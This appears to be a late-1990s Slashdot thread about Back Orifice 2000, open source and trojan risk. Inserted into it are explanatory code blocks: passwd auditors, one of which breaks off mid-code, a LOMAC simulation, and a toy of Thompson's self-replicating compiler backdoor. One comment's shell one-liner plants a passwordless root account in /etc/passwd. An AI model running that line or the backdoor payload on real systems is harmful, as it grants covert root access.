    I'd almost like to see this one go to court. After Microsoft somehow managed to win the Bristol case (I still can't understand how the jury came to that conclusion), It'd make me feel better to see them get themselves into another case where they'll end up looking stupid. cDc makes a pretty good argument on their website. It's amazing the lengths MS will go to to avoid having to admit that their programs have bugs.

    --
    It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer
  50. So.... what's your point? by Danse · · Score: 1

    He did a bad thing. He should be arrested and barbecued for his blatant attempt to take that which most definitely did not belong to him. What's to stop someone from doing the same thing with proprietary software? They hire a bunch of programmers and make a real product. After a year or two, people trust them. Then he goes and sticks in his little back door and nobody knows about it... not even his own programmers. This is why we have laws. It has nothing to do with open/closed source. It has to do with malicious intent.

    --
    It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer
  51. Re:That is the point! by /dev/niall · · Score: 1
    KrAphtd1nN3r wrote:
    Besides, unless the sysadmin is very crappy, users should never be allowed to write to code files.

    My cheesy little friend, do you really think that everybody developing on *NIX boxen has root access?

    Nope, they don't. And you need access to system header files to do anything of consequence.

    Unless, of course, your company is preparing for the release of "Hello, World! 2000". ;)

    --
  52. How Silly by mholve · · Score: 0

    How ya gonna hide trojan horses in stuff when you have the source code? I suppose one could download binary-only versions, but that's YOUR fault and not that of Open Source.

  53. Re:possibly misinterpreted (virii) by krynos · · Score: 2
    I remember in 1994 reading the 40Hex and NuKE Info Journal that had source code to viruses, sometimes only the binary or disassembled and commented source (from binaries). Having virus and trojan source code is nothing new (40Hex and NIJ did exist a while before I had net access)

    I still wonder what happened to them.

    Interestingly, the viruses were very often using undocumented functions in MS-DOS (and not only the InDos flag), some were really incredible.

  54. Dangerous conclusion by Rene S. Hollan · · Score: 1

    ... actually, if open source development leads to faster production of "bad things", then clearly it must be regulated, in the same way hand guns, drugs, booze, and auto licenses are. Only the "responsible" few should be allowed to code openly.

    Think it can't happen?

    --
    In Liberty, Rene
    1. Re:Dangerous conclusion by chromatic · · Score: 1


      Look at all of the irresponsible closed source software out there, heh heh.

      --
      QDMerge -- data + templates = documents.

    2. Re:Dangerous conclusion by Godin · · Score: 1

      along that same line of thinking, though, regulation wouldn't do anything except stop the law abiding citizens from coding. the ones that are coding viruses and trojans (while I understand coding them isn't illegal) would still fall outside of legality and the law wouldn't affect them in the least. If criminals obtain handguns/drugs/licences illegally, then more laws/regulations are not going to stop them, only make them more creative.

      >"Cynic?? Who's a cynic?"

      --
      --"Cynical?? Who's cynical???" -k-
  55. Re:possibly misinterpreted by Gregg M · · Score: 3

    When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,

    Excuse me ?? Macro Viruses? Wasn't it Microsoft's own macro language that resulted in the rise of Macro Viruses. Open source had nothing to do with it. Damn, read that line again, what a load of Bullsh#t!

    If you go to the BO2k website you'll see that Microsoft uses the STEALTH feature in their own product.

    www.cultdeadcow.com/news/pr19990719.html

    SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical
    stealth feature. As a matter of fact, they explain this feature in a Word document available
    from the Microsoft website:

    --
    Linux is only free if your time has no value. Windows is only free if you threaten to use Linux.
  56. Re:there already is! by Improv · · Score: 1

    Some code is obscure even being in clear sight.
    Consider Linux or Mozilla -- their source trees
    are huge, and if one were particularly untrusting,
    one might think that it would be easy for such
    groups to accidentally or purposefully stick code
    in that could be problematic WRT security. The
    trust that can be applied to small projects WRT
    security can't necessarily be given to larger
    projects, as the chance of someone, or even everyone collectively,
    looking at the problematic section(s) and knowing
    enough to recognize a security problem isn't
    particularly inspiring. OTOH, it certainly beats
    binary distributions :)

    --
    For every problem, there is at least one solution that is simple, neat, and wrong.
  57. Re:there already is! by Improv · · Score: 1

    I'm not claiming that, although some people might.
    But on a practical level, things submitted by
    people from outside with ill intent or lack of
    a clue could cause security issues, and it seems
    that even with a reviewer, some bad code will
    quite possibly get in.

    --
    For every problem, there is at least one solution that is simple, neat, and wrong.
  58. Verification group? by Improv · · Score: 2

    It would be interesting and useful to make an OSS
    verification group which would audit open source
    projects for security problems (intentional or no),
    determine what platforms the source compiles on,
    look for bugs, and ideally submit patches back to
    authors and possibly sell support and/or legal
    liability for program failings.

    --
    For every problem, there is at least one solution that is simple, neat, and wrong.
    1. Re:Verification group? by dkusters · · Score: 2

      A verification group for OSS is a large order. There are several smaller groups working on different code bases. One of the more thorough would probably be the OpenBSD group (http://www.openbsd.org/). They constantly scour their source base (originally forked off of another *BSD group) for security problems. Due to the diligent efforts of the OpenBSD group, their operating system can be quite justifiably touted as the most secure standard operating system that is somewhat widely used.

    2. Re:Verification group? by linuxci · · Score: 1

      There's a project called the Linux Security Audit. They were talking about it at the UKUUG Linux '99 Conference and basically they do what you say - go through open source software contained in Linux distributions and look for security holes.

      I can't remember their URL so if anyone does have any info on them post it here.
      --

    3. Re:Verification group? by Godin · · Score: 1

      The mere thought of a verification group lends to the increase of corruption.

      It is a noble sounding idea, but if you establish a few elite coders as the last line of defense, what happens when some hacker decides to put one of the forum on his payroll. Then every application he/she reviews may, or may not hide a trojan, or virus. then the unsuspecting public (unsuspecting because they were willing to trust their digital safety to a stranger) is suddenly surprised by some bonehead running off with millions of dollars and the secret files of our most hidden desires...

      every crooked politician who has ever changed their stance based on lobbyist funding is testimony to this...

      >"Cynic?? Who's a cynic??

      --
      --"Cynical?? Who's cynical???" -k-
  59. Re:Missing the point of BO2K by Sneakums · · Score: 1

    Well, I just sent this to McAfee on their feedback form after I read their BO2K page (http://www.mcafee.com/viruses/bo2000/what_bo2k_does.asp):

    --BEGIN--

    In a number of places on your page about BO2K, you refer to it as a "virus" and a "trojan".

    BO2K is neither of these. Viruses spread themselves; BO2K does not. Trojan horses pretend to be something they are not; BO2K does not.

    Back Orifice 2000's website (http://www.bo2k.com) makes no bones about what it is: it is a remote administration program. It hides from the task list to stop clueless users from removing it, and then only on 95/98. On NT, it is visible in the task list running as a service.

    You refer to the original Back Orifice being "discovered" on October 15 1998... The software was announced with a press release on July 21 1998. Where's the discovery in that?

    Back Orifice 2000 is a tool that allows the installer to control a machine remotely. It is no different in function from pcAnywhere or other such tools. As a side effect, it demonstrates the woeful security present in Microsoft's operating systems.

    Personally, I find your characterisation of BackOrifice 2000 offensive and sensationalistic. Sensationalising the possible effects of the tool is one thing, but sensationalising its essential nature is another thing entirely.

    Yours,

    Paul Collins.

    --END--

    Yes, I have seen the typos ;-)

    ------------p!

  60. possibly misinterpreted by pridkett · · Score: 4

    I think that you might have misinterpreted what this article is about. It is merely an article about Bo2k and how the fact that it IS open source will cause problems for people. Meanwhile, it elides the somewhat minor problem of people writing patches for legitimate software that turns it into trojan like software.

    However I did glean a few bits of interesting stuff. Mainly that Microsoft is saying that if its a real remote admin tool that it wouldn't hide from the administrator. Umm, excuse me, I have the displeasure of having an NT server box here at work that I'm pseudo responsible for and NT Server Manager hides.

    Secondly it doesn't mention the fact that if NT were written worth a damn, then it wouldn't be POSSIBLE to do this sort of stuff to it. There was the comment about it preying on users and not administrators, which is partially true, but its really MSs fault in the first place.

    There was only one other thing that I disagreed with. It said something about when virus writers switched to open source in 1996 (like it was some sort of heavenly revelation) that there was proliferation in macro viruses. This may be true. But its more likely due to the rise of people who are using IE and Outlook for their net browsing and email reading.

    Oh well, if nothing else the cDc by releasing the source code will actually FORCE microsoft to patch the hole and release patches that detect the software.

    --
    My Slashdot account is old enough to drink...
    1. Re:possibly misinterpreted by dirty · · Score: 2

      The argument that if nt were a real OS this wouldn't be possible is pure bull. The same thing is quite possible on *nix. Look at vnc, it's essentially the same thing, it lets you act as if you were sitting right in front of the console in X windows. Or telnetd, it lets you pretend you are right at the console. Simple unix trojan horse program that allows pretty much the same level of control:

      #!/bin/sh
      # appends a second UID 0 account, "foo", with an empty password field
      echo foo::0:0::/:/bin/sh >> /etc/passwd

      Just get some fool to run this program as root, and boom, you now "0wn" his box. Don't think just because you are using *nix that you are some how safe from this type of attack.

      --

      -matt
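The one-liner in the post above plants a second UID 0 account with an empty password field in /etc/passwd. As an added example, not part of the thread or of any project it mentions, here is a small audit script that parses passwd-format text and flags that backdoor along with two related signs of tampering (a password hash kept in passwd instead of shadow, and malformed entries). The sample content and every name in it (SAMPLE_PASSWD, audit_passwd, the accounts) are constructed for this example; the default path in audit_file is just the usual location of the file.

```python
"""Added example: audit /etc/passwd-format content for the backdoor in the
post above (an extra UID 0 account with an empty password field) and for
related signs of tampering. SAMPLE_PASSWD is constructed, not a real file."""

# Second field values that mean "shadowed" or "locked" rather than a hash.
LOCKED_MARKERS = ("x", "*", "!", "!!")

# Constructed sample: three normal entries, the planted "foo" account from
# the post, and an account whose hash was written straight into passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
foo::0:0::/:/bin/sh
bob:$6$saltsalt$notarealhash:1001:1001:Bob:/home/bob:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (line number, finding, account-or-line) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # passwd entries have exactly seven colon-separated fields.
            findings.append((lineno, "malformed entry", line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit():
            findings.append((lineno, "non-numeric uid", name))
            continue
        if pw == "":
            # No password at all. Unless a shadow entry for the same name
            # overrides it, login needs no credential.
            findings.append((lineno, "empty password field", name))
        elif pw not in LOCKED_MARKERS and not pw.startswith("!"):
            # A hash stored here is world-readable and bypasses /etc/shadow.
            findings.append((lineno, "hash stored in passwd", name))
        if uid == "0" and name != "root":
            # Any extra UID 0 account is a root-equivalent login.
            findings.append((lineno, "extra uid-0 account", name))
    return findings


def audit_file(path="/etc/passwd"):
    """Audit a real file; the default is the usual passwd location."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, finding, who in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {finding}: {who}")
```

Run against the sample, the "foo" line produces two findings (empty password field, extra uid-0 account) and the "bob" line one (hash stored in passwd); the normal entries produce none. On a live system, pair this with a comparison against a known-good copy of the file, since a one-line append is exactly the kind of change a periodic diff catches.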
    2. Re:possibly misinterpreted by Benjamin Shniper · · Score: 2

      I think you hit the nail on the head.

      But if the article was about Bo2K,then it would not mention Linux or Apache. Why did the author feel the need to compare these two secure, useful programs with one that was, at best, created to take advantage of computer system's vulnerabilities? Perhaps, pervertedly, the author is claiming that Back Orifice, just like its open source brothers, is a threat to Microsoft. If linux must share the spotlight with hacking of this caliber, then linux should lead the charge to eliminate this bad omen.

      Microsoft has been in the habit of claiming that the next version (windows 2000) will cure all ills. As any computer scientist knows, all OS systems need to make trade-offs though. They have, for example, traded security and openness for quick financial gain. Back Orifice is the least productive way to cause Microsoft harm, as it does nothing but make Microsoft look like a helpless victim against sneak attacks. It won't take all two of the reporters brain cells firing to compare that to the "attack" from linux.

      -Ben

    3. Re:possibly misinterpreted by ~k.lee · · Score: 1

      Err, part of the point of KT's essay was that his hack was undetectable even with the source code. Once you rebuild the compiler once with the infected source, it's undetectable and virtually unremovable unless you can get a hold of binaries that are verifiably "pure".

      Strictly speaking, of course, you don't have to accept a precompiled compiler. I took a course once with Robert Dewar, a legendary professor at NYU who told us a story about bootstrapping a computer from scratch-- no assembler, no display driver, no disk drive, nothing but a power switch and a BIOS that could accept raw machine-language hex input from the keyboard to execute. First he wrote a display driver, then he wrote a driver for the tape drive, and finally he wrote an assembler, all in machine language. After that things got considerably easier (ha).

      The point being, there is always the possibility of bootstrapping yourself up if you really need to. Anyway, I imagine that it's somewhat more difficult to embed a KT-type "trust" virus inside an assembler than a compiler, given that the assembler runs at such a low semantic level. Compilers used to be written in assembly, and they can be so written again.

      ~k.lee

      --
      (remove nospam for email)
    4. Re:possibly misinterpreted by Reziac · · Score: 1

      Someone says
      However I did glean a few bits of interesting stuff. Mainly that Microsoft is saying that if its a real remote admin tool that it wouldn't hide from the administrator. Umm, excuse me, I have the displeasure of having an NT server box here at work that I'm pseudo responsible for and NT Server Manager hides.
      ===========================
      In fact, that anything you can think of can be done remotely to anyone's workstation without the user knowing the sysadmin is peering over their shoulder is one of the things M$ is touting as a FEATURE in Win2000.

      I do wonder if M$ actually pilfered the whole idea from BO in the first place :)

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    5. Re:possibly misinterpreted by ptevis · · Score: 1
      No one seems to be mentioning a particularly interesting bit of history here. When the UNIX system first appeared Kernighan and Thompson pointed out that they could have encoded a nearly undetectable bug into the C compiler that came with the system. Suppose, they said, that whenever the C compiler recognized that it was compiling the login program (a simple enough pattern match) it would insert code that allowed Ken Thompson to login without a password. Further, whenever it compiled a C compiler, it would embed code to duplicate this "functionality" in the new compiler (again, not horribly difficult). They showed that since at some point you have to accept a precompiled compiler, this bug is practically undetectable. Second, they pointed out that any time you accept a precompiled binary, you are exposing yourself to this kind of security risk.


      That, I think, is one of the strongest practical reasons in favor of the open source model. The ability to actually see what a program is doing to the machine you are running it on is a major advantage. A 50,000 line file may not be easy to read, but source code is definitely much easier than a million lines of 1's and 0's.

      pridkett is right though. This isn't really an article about open source, it's about BO2K. Yet another example of the media trying to generate interest in a topic many don't understand by throwing vaguely connected buzzwords at it.
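The compiler backdoor that ~k.lee and ptevis describe above (Thompson's "Reflections on Trusting Trust") is short enough to reproduce in miniature. What follows is an added example written for this page, not code from the thread, from Thompson's paper, or from any project mentioned here. The "compiler" is a Python function that turns a source string into a namespace with exec(), and the "binary" is the resulting code object; LOGIN_SRC, COMPILER_SRC, PAYLOAD_TEMPLATE and the function names are this example's own. The payload is a quine: it rewrites any login program it sees to accept a master password, and any compiler it sees to carry the payload forward, so a compiler rebuilt from perfectly clean, audited source by an infected compiler is still infected. The last function shows the countermeasure ~k.lee hints at, which in current practice is called diverse double-compiling: build the same source through an independently trusted compiler and compare the results.

```python
"""Added example: toy model of Thompson's compiler backdoor and of the
diverse double-compiling (DDC) check that exposes it. Not from the page."""

# Constructed toy inputs: a login program and a compiler, both clean.
LOGIN_SRC = """
def check_password(passwords, user, password):
    return passwords.get(user) == password
"""

COMPILER_SRC = """
def compile_source(src):
    ns = {}
    exec(src, ns)
    return ns
"""

# The self-replicating patch. It is a quine: the trailing %r slot receives
# the template itself, and "%%" comes out as a single "%" so the emitted
# code can repeat the trick when it infects the next compiler.
PAYLOAD_TEMPLATE = '''
def _patch(src):
    # Backdoor 1: any login program also accepts the master password.
    src = src.replace(
        "return passwords.get(user) == password",
        "return password == 'ken' or passwords.get(user) == password")
    # Backdoor 2: any compiler gets this patcher prepended and calls it.
    if "def compile_source" in src:
        src = src.replace("    exec(src, ns)",
                          "    src = _patch(src)\\n    exec(src, ns)")
        src = (PAYLOAD_TEMPLATE %% PAYLOAD_TEMPLATE) + src
    return src
PAYLOAD_TEMPLATE = %r
'''
PAYLOAD = PAYLOAD_TEMPLATE % PAYLOAD_TEMPLATE


def clean_compiler():
    """Compiler built directly from the audited source: honest."""
    ns = {}
    exec(COMPILER_SRC, ns)
    return ns["compile_source"]


def bootstrap_infected_compiler():
    """Stage 0: the one time the payload is applied by hand. After this
    the payload never needs to appear in any source file again."""
    seed = {}
    exec(PAYLOAD, seed)
    stage0 = {}
    exec(seed["_patch"](COMPILER_SRC), stage0)
    return stage0["compile_source"]


def rebuild_compiler(compiler):
    """Recompile the clean compiler source with the given compiler."""
    return compiler(COMPILER_SRC)["compile_source"]


def login_accepts(compiler, user, password):
    """Build the login program with `compiler` and try a credential."""
    ns = compiler(LOGIN_SRC)
    return ns["check_password"]({"alice": "s3cret"}, user, password)


def ddc_differs(trusted, suspect):
    """Diverse double-compiling: rebuild the compiler twice from the same
    source through each chain and compare the final 'binaries'. A clean
    suspect reproduces the trusted result; a trojaned one cannot."""
    t2 = rebuild_compiler(rebuild_compiler(trusted))
    s2 = rebuild_compiler(rebuild_compiler(suspect))
    return t2.__code__.co_code != s2.__code__.co_code


if __name__ == "__main__":
    clean = clean_compiler()
    infected = bootstrap_infected_compiler()
    gen2 = rebuild_compiler(infected)   # built from the clean source
    print("clean compiler accepts master password:",
          login_accepts(clean, "alice", "ken"))
    print("infected compiler accepts master password:",
          login_accepts(infected, "alice", "ken"))
    print("compiler rebuilt from clean source still does:",
          login_accepts(gen2, "alice", "ken"))
    print("payload visible in compiler source:", "_patch" in COMPILER_SRC)
    print("DDC flags the infected compiler:", ddc_differs(clean, infected))
```

The point of gen2 is the one ptevis makes: the compiler source you audit never contains the backdoor, yet every compiler and every login program built through the infected chain carries it. The DDC check works because the trusted compiler only has to be independent of the suspect one, not bug-free; in this toy the comparison is on bytecode, where a real check compares the two output binaries.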

    6. Re:possibly misinterpreted by barleyguy · · Score: 1

      Whoever wrote this article had a logic error here. First, there aren't any open source OSes that are susceptible to macro viruses, especially Outlook/Word macro viruses. Second, macros are inherently open source, because they are interpreted. But this has absolutely nothing to do with "open source" from the classical definition.

      I've got a weird feeling the guy who wrote this article really doesn't know what he's talking about. Just a hunch.

      --
      --- "So THAT's what an invisible barrier looks like!" - Time Bandits
    7. Re:possibly misinterpreted by Syslevel · · Score: 1

      Funny how any time I've tried to do anything as direct and brutal as that to /etc/passwd the shadow password stuff just gets mean and doesn't let the proverbial user 'foo' do much of anything.

  61. FUD. by jjohn · · Score: 2

    This is an old issue. Not totally without merit, but as companies like Red Hat come to depend on OSS code, I'm sure some amount of QA will be done.

    Further, OSS has been around a long while. This sort of thing can happen, but it doesn't last too long.

    Sounds like a case of old-fashioned FUD.

  62. Re:Why Bother? by dattaway · · Score: 2

    Why bother with articles like this? Because issues about security need to be discussed. It's bringing valuable topics that can educate more people about why security is too underrated and how to make it top priority. We need to share more horror stories that are often hidden in fear and shame so people will start to value what a good system can do to protect their resources. Expect to see articles like this many times in the future.

  63. Trojans open a possibility of tactical attack? by Blue Hammer · · Score: 1

    If I were in the MS camp, and worried -- as they appear to be getting, I would think about sabotaging packages. If a given group was talented and intent, what would stop them from deliberately sabotaging packages and then claiming to the press/world how vulnerable the Open Source community is?

    Gates lost a lot of sleep when he thought Netscape was a challenger. He and MS as a whole have been shown to pull some VERY dirty stunts to protect their market share. I'm not saying that they do this, or even that MS specifically would, but what's stopping people from doing it?

    I don't pretend to know a lot about the security of the packages and the sources they are mirrored, so this is not a rhetorical question.

    --
    ** Black holes are where God divided by zero **
  64. Serious mis-interpretation going on here by Bruce Perens · · Score: 4
    The article does not say that Open Source has more security problems.

    The article says that because Back Orifice is open source, there will be more variants of Back Orifice, and that this will be more of a problem for virus detection vendors.

    However, the security problem exploited by Back Orifice is Microsoft's fault. The release of Back Orifice is an attempt to force Microsoft to deal with its security problems.

    Folks, if you are running software that has wide-open security problems, like Back Office, and the vendor won't help you except to give you sorry band-aids like virus detection software, it's time for you to lean on that vendor. There is no reason for Microsoft to continue to leave the barn door open - they are every bit as guilty as the computer criminals who exploit that, and in a just world MS executives would be charged, tried, and jailed for the computer crime they have facilitated.

    Thanks

    Bruce Perens

  65. Re:Open-source Trojan Horses by Peter La Casse · · Score: 1

    "The problem with BO2K being 'open-source' is that crackers will NOT publish their modifications to the code."

    What do you mean, they won't publish their modifications? They have to, according to the license, or else they're breaking the law!

    :)

  66. Dogs and cats.. living together.. MASS HYSTERIA! by Z0z · · Score: 3

    BO2K (or BO for that matter) do not exploit anything. Ever hear of "Remotely Possible","PC Anywhere", or any one of the numerous other remote control products? The only security flaw it seems to be exploiting is the ease of hiding a process from the user. This isn't to say that BO isn't a security risk, because it most definitely is. Maybe that is mainly due to the mindset of most Microsoft product users, but other users of other systems are not immune.

    Basically BO enables a single-user system to act with some of the functionality of a multi-user system. Something Windows 9x definitely doesn't have the security for. Windows NT has some protection in this realm, but still, not enough for a multi-user system. They were never designed to be multi-user systems. But then again, a root kit will enable the same functions on a linux box as this does on a Windows box, it just may be a bit more of a challenge to get the thing installed.

    One interesting flaw (well, IMHO it's a flaw) that this could potentially exploit with the right plug-in, is a feature of the MS Crypto-API that will release any certificates installed in the system. If someone teaches the BO doggy a new trick to extract certificates (which as a process of the user, it has the right to do, WITHOUT authentication) there could potentially be a big problem with digital signatures, which are now becoming accepted as substitutes for "wet" signatures (think: paper and pen).

    Oh.. think of the possibilities..


    P.S. - I am a spelling and grammer genius. Any errors you think you see in this document are probably just transmition errors, and most likely your fault.



    --
    P.S. Any misspellings or faults of grammar you think you detect are mearly transmition errors, and probably your fault a
  67. Re:That is the point! by Chris Hiner · · Score: 1

    It's also possible to modify the executable directly, without having the source. The people that crack copy protection do this all the time... Having the source at least lets you build your own known good version...

  68. Re:Did you people read the article? by Scola · · Score: 1

    Yeah, I guess the conclusion one can draw is you can develop better, more diverse, and stronger products with an open source model than a closed one. This general rule applies for products from the dark side as well as from the good guys.

  69. Another major reference to OSS security by MrSpock · · Score: 1

    Tux made the cover of Internet Security Magazine (or something like that; doesn't seem to be online -- I saw it on the newsstand). The article did a really good job of dispelling the "susceptibility to trojans" claim, as well as many other common corporate objections to deploying OSS (such as "if something goes wrong, who do I sue").

    The mag may be worth picking up just for the two (a dozen or so pages total) Linux security articles in it.

  70. Re:Clarification (Was Re:What they really mean...) by Juggler · · Score: 1
    It is possible to deal with this sort of thing, although neither Linux, NT nor any other OS I'm familiar with (which I'll admit aren't very many) implements it.

    Check out LOMAC; it's a system that marks connections (and possibly files as well, I forget) as "untrustworthy" if they come from an untrustworthy medium, such as the internet. Untrusted processes can't mess with trusted stuff, no matter whether they are running as root or nobody...

    I like the idea a lot, for a normal workstation.
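    The low-water-mark behaviour described in this post, as an added toy simulation (not LOMAC's own code): it assumes just two integrity levels, a process that reads from an untrusted source is demoted, and a demoted process is refused writes to trusted objects even when its uid is 0.

```python
"""Toy simulation of a LOMAC-style low-water-mark integrity policy.

Added illustration, not LOMAC's own code. It assumes two integrity
levels: HIGH for local, trusted objects and LOW for anything that
arrived over an untrusted medium such as a network socket. A process
starts HIGH, drops to LOW the moment it reads LOW data, and a LOW
process cannot write HIGH objects no matter which uid it runs as.
"""
from dataclasses import dataclass, field

LOW, HIGH = 0, 1


@dataclass
class Obj:
    """A file or connection carrying an integrity label."""
    name: str
    level: int
    contents: list = field(default_factory=list)


@dataclass
class Proc:
    """A subject; level is its current low-water mark."""
    name: str
    uid: int
    level: int = HIGH
    audit: list = field(default_factory=list)


def read(proc, obj):
    """Low-water-mark rule: reading lower-integrity data demotes the reader."""
    if obj.level < proc.level:
        proc.level = obj.level
        proc.audit.append(f"{proc.name} demoted to LOW after reading {obj.name}")
    return list(obj.contents)


def write(proc, obj, data):
    """No write to an object whose level is above the subject's current level."""
    if obj.level > proc.level:
        proc.audit.append(f"DENIED {proc.name} (uid {proc.uid}) write to {obj.name}")
        return False
    obj.contents.append(data)
    return True


def scenario():
    """Two root processes; only the one that touched the network is blocked."""
    passwd = Obj("/etc/passwd", HIGH, ["root:x:0:0:root:/root:/bin/sh"])
    # Constructed inbound data: the same line the thread's one-liner appends.
    socket = Obj("tcp:inbound", LOW, ["foo::0:0::/:/bin/sh"])
    tmp = Obj("/tmp/scratch", LOW)

    netd = Proc("netd", uid=0)  # root daemon that reads the socket
    payload = read(netd, socket)[0]
    net_write_ok = write(netd, passwd, payload)  # denied despite uid 0
    tmp_write_ok = write(netd, tmp, payload)     # LOW -> LOW is allowed

    admin = Proc("admin-shell", uid=0)  # root that never read untrusted data
    admin_ok = write(admin, passwd, "bob:x:1001:1001::/home/bob:/bin/sh")

    return {
        "netd_level": netd.level,
        "net_write_ok": net_write_ok,
        "tmp_write_ok": tmp_write_ok,
        "admin_write_ok": admin_ok,
        "passwd": list(passwd.contents),
        "audit": netd.audit,
    }


if __name__ == "__main__":
    for key, value in scenario().items():
        print(key, "=", value)
```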

  71. BO2K distribution at DefCon by unitron · · Score: 1

    When CDC tossed BO2K CDs into the crowd...
    "ISS immediately passed along copies to watchdog groups such as the Computer Emergency Response Team (CERT) and ICSA as well as Microsoft."
    Shouldn't MS have had to pay several hundred dollars for a binary only copy that came with a "no looking at or reverse engineering and if it screws up your system we ain't responsible, and by breaking open the shrink wrap you agree to all this" license agreement?


    --

    I see even classic Slashdot is now pretty much unusable on dial up anymore.

  72. OSS & Macros - quite the opposite actually by Booker · · Score: 2
    When virus writers moved to an open source model in 1996, there was an explosion in macro viruses, ICSA's Thompson said.

    Isn't it actually the other way around? I thought that macros were by definition open source (i.e. not compiled) so variants were easily proliferated. This is different from saying that once "virus hackers" decided to open their source, people suddenly had new tools to create macro viruses.

    p.s. damn, I was gonna use that sig! :)

  73. Anti virus software by ocie · · Score: 1

    If viruses are developed faster because their makers moved to an "open source" model, then this would seem to provide an argument that anti-viral software should also have an open source model.

    But for the most part, anti virus software is just a bandaid to cover for something that the OS should be doing in the first place. Frankly, I think OSS and Free software developers have better things to do with their time. Secure delete and undelete in Linux might be nice.

    --
    JET Program: see Japan, meet intere
  74. Errata and other points by Barbarian · · Score: 1

    1) "Internet Security Systems researchers have already decoded BO2K protocols and encryption algorithms". So they know how to read source code? Amazing!

    2) "Unlike a predecessor released last year that attacked Windows 95/98 systems, BO2K is designed to evade detection". Enough said. How about getting Editors with brains?

    3) "On one hand, IT managers can examine code to see how BO2K operates...". And they can also examine it and see EXACTLY what it does, and then install it in place of Microsoft's remote admin. tools. With Microsoft's and other closed-source third party tools, it's anyone's guess.

    4) "Users advised not to open e-mail attachments from unknown sources or accept files from Internet chat systems." How about not opening executables from ANYONE. This point is obviously poorly thought out, as the zip_explorer.exe trojan ALWAYS came from a KNOWN source. Even better, what if email programs didn't automatically run .exe's when you double click them in windows?

  75. Oh, these "security experts" ARE pundits by Pac · · Score: 1

    See, the business logic behind antivirus software production dictates that these companies' executives be always spreading panic among the innocent userbase. Otherwise, who'd bother to upgrade/buy their products?

    There is also a fine similarity between the Microsoft/Intel relationship (upgrade existing bloatware/upgrade processor/upgrade bloatware/...) and the Microsoft/Antivirus makers relationship (upgrade bloatware/discover new hole/exploit new hole - this step the kids will do for free/upgrade antivirus/...)

  76. The article is Right On the Mark! by PD · · Score: 2

    I've already seen a trojan hiding in a program. I was looking at this whizbang spreadsheet and it had an entire FLIGHT SIMULATOR built into it. Can you imagine that some hacker who had access to the source code can slip something like that into the code? Good thing it was harmless and didn't format my hard drive.

    Yup, that open source is DANGEROUS.....er, wait a sec....me very sorry....the spreadsheet was Microsoft Excel....nevermind.

  77. FUD, Microsoft's Influence, and What am I going to by OnyxRaven · · Score: 1
    A few things to talk about - I hope someone reads this... who knows.

    1: FUD:
    This is pretty self explanatory, it's filled with FUD. Fear of "oh no, the 'hackers' are going to get me.", Uncertainty of what it is, what it can do, Doubt of it NOT causing a big problem like is promoted in the article. BO was pretty contained, considering. The article was also a huge stab at OSS, which is totally unwarranted. I sure hope someone posts an article on a big news outlet that revives OSS (that is if anyone takes this article seriously, which I'm sure many will).

    2: Microsoft's Influence in the Media:
    If you look around the magazine racks - you'll see Windows *, PC *, and even some Computer * and Internet * magazine titles. Know who they all tend to cater to? No, not PC's in general. Windows (Namely 9x), and microsoft microsoft microsoft. Wonder why they didn't bring up the fact that cDc has asked why SMS isn't under the same scrutiny? why didn't they explain what 'insidious mode' was? FUD, Bad sources, or better yet, no sources. Many other news organizations have talked to various cDc members (they're pretty responsive to emails, I know) so why didn't they? I'm waiting for my subscription to PCWorld to expire - it blows frankly. It didn't give the Orb drive a second thought, neither with Netscape, neither with the K7. (forgot to say the bit about intel and the media - but enough)

    3: What am I Going to Do? (silly short topic):
    I've played around with BO2k already. Great tool for remote admin - in a market where other packages cost an arm and a leg. If the AV companies all delete the hell out of BO2k, I'm not going to be able to use it, because I'm thinking I will rely on both. (the upcoming plugins for bo2k will help in software distribution GREATLY.) What should I do? I don't know enough C/++ whatever to modify what the signature would be - maybe some tips?

    --
    --onyx--
  78. Re:The real Trojan Horse by smileyy · · Score: 1

    I always thought this proverb worked better "Beware of gifts bearing Greeks".

    --
    pooptruck
  79. Root access by Natedog · · Score: 1

    #!/bin/sh

    echo foo::0:0::/:/bin/sh >> /etc/passwd

    If you can get root to run this then you need to find another SA. Once *NIX is installed very little needs to be done as root. If you need to install a program as root you better know where it came from and if it can be trusted. I doubt you could even find a case where someone has broken into a system by getting the SA to overwrite /etc/passwd. Most other programs can be installed by the user into that user's home directory so no real security issues can arise. On NT, I just gave up and gave myself admin (and so does everyone I know) because I was logging in as administrator and switching back to my user account so often. The MS "security" model just plain sucks. I would like to see someone set up NT with read only file access to the entire system except for the user's home directory - it just ain't going to happen.

    --
    \forall code \in C, \frac{\Delta readability(code)}{\Delta t} < 0
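    A defender's counterpart to the one-liner in this post, as an added example (not code from the post): a small auditor for passwd-format text that flags exactly the kind of entry that script appends, with a constructed sample file.

```python
"""Audit passwd-format text for the kind of backdoor the post shows.

Added example, not code from the post. It parses /etc/passwd-style
lines and reports entries a sysadmin should look at: UID 0 accounts
other than root, empty password fields, malformed lines and duplicate
user names. The sample data below is constructed, not from a real host.
"""
from collections import Counter

# Constructed sample: the last line is exactly what the post's script appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
foo::0:0::/:/bin/sh
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Return (entries, errors): entries as dicts, errors as strings."""
    entries, errors = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            errors.append(f"line {lineno}: expected 7 fields, got {len(parts)}")
            continue
        entry = dict(zip(FIELDS, parts))
        try:
            entry["uid"] = int(entry["uid"])
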